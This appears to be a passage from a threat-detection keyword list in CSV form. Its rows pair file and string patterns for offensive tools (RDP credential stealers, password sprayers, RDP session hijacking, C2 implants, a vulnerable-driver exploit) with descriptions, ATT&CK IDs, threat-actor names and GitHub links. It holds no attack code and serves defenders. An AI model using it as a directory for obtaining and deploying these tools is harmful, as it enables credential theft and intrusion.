-*RDPassSpray-master*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*rdpbrute.py*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*RDP-Caching.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*RDPCredentialStealer.zip*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*RDPCredentialStealer-main*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*RDPCredsStealerDLL.*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*RDPCredsStealerDLL.dll*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*rdphijack.*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x64.*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x86.*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*RDPHijack-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*RDPHijack-BOF*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*RDPInception*,offensive_tool_keyword,RDPInception,A proof of concept for the RDP Inception Attack,T1188 - T1214 - T1076 - T1555.003,TA0007 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/mdsecactivebreach/RDPInception,1,1,N/A,N/A,4,338,677,2017-06-29T16:57:25Z,2017-06-29T10:08:23Z -*rdpscraper*,offensive_tool_keyword,rdpscraper,rdpscraper - Enumerates users based off RDP Screenshots,T1110 - T1189 - T1056.001,TA0006 - TA0008 - TA0011,N/A,N/A,Information Gathering,https://github.com/x90skysn3k/rdpscraper,1,1,N/A,N/A,1,34,15,2023-10-03T21:05:48Z,2017-07-19T17:02:24Z -*RDPSpray*,offensive_tool_keyword,RDPSpray,Tool for password spraying RDP,T1110.001 - T1555.002,TA0006 - TA0040 - TA0003,N/A,N/A,Credential Access,https://github.com/dafthack/RDPSpray,1,1,N/A,N/A,1,89,40,2018-10-12T18:32:51Z,2018-10-12T18:29:52Z -*RdpThief*,offensive_tool_keyword,RdpThief,RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process. will perform API hooking. extract the clear-text credentials and save them to a file. An aggressor script accompanies it. which is responsible for managing the state. monitoring for new processes and injecting the shellcode in mstsc.exe. The DLL has been converted to shellcode using the sRDI project (https://github.com/monoxgas/sRDI). When enabled. RdpThief will get the process list every 5 seconds. search for mstsc.exe. and inject to it,T1055 - T1547 - T1059 - T1078,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/0x09AL/RdpThief,1,1,N/A,N/A,10,1014,503,2019-11-13T14:13:52Z,2019-11-03T17:54:38Z -*RdpThief.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*rdrleakdiag.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*read_cs_teamserver*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*readShellcode*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*ReadyToPhish.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*RealBey/ThisIsNotRat*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,1,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*realgam3*,offensive_tool_keyword,Github Username,github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/realgam3,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Real-Passwords*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Reaper.exe kp *,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*Reaper.exe sp *,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*Reaper-main.zip*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*rebootuser/LinEnum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*REC2 implant for Mastodon*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*REC2 implant for VirusTotal*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2::modules::rec2mastodon*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2_mastodon_x64.exe*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2_virustotal_x64.exe*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2mastodon.rs*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2virustotal*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2virustotal.rs*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*Receive-AgentJob*,offensive_tool_keyword,empire,empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*reciclador.cpp*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*reciclador.dll*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*reciclador.vcxproj*,offensive_tool_keyword,mssqlproxy,mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse,T1021.002 - T1071.001 - T1573.002,TA0008 - TA0011,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/blackarrowsec/mssqlproxy,1,1,N/A,10,7,682,113,2021-02-16T20:13:04Z,2020-02-12T08:44:28Z -*recon_passive.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Recon-AD-*.dll*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-*.sln*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-*.vcxproj*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Recon-AD,1,1,N/A,10,10,288,57,2019-10-20T21:49:39Z,2019-10-20T21:09:41Z -*Recon-AD-AllLocalGroups*,offensive_tool_keyword,cobaltstrike,Recon-AD an AD recon tool based on ADSI and reflective DLL s,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 